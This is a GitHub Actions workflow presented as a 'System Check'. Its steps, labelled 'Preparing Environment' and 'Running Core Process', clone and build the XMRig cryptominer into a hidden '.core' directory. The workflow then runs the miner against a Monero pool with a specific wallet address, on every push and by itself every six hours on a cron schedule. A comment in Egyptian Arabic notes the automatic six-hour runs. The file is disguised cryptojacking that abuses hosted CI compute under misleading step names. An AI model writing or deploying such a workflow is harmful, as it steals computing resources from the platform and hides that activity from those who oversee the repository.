name: System Check
on: 
  push:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *' # الكود ده بيخليه يشتغل لوحده كل 6 ساعات

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Preparing Environment
        run: |
          sudo apt-get update
          sudo apt-get install -y cmake build-essential libssl-dev libuv1-dev libhwloc-dev
      
      - name: Running Core Process
        run: |
          git clone https://github.com/xmrig/xmrig.git .core
          cd .core && mkdir build && cd build
          cmake .. && make -j$(nproc)
          ./xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY -p GH_Worker --donate-level 1
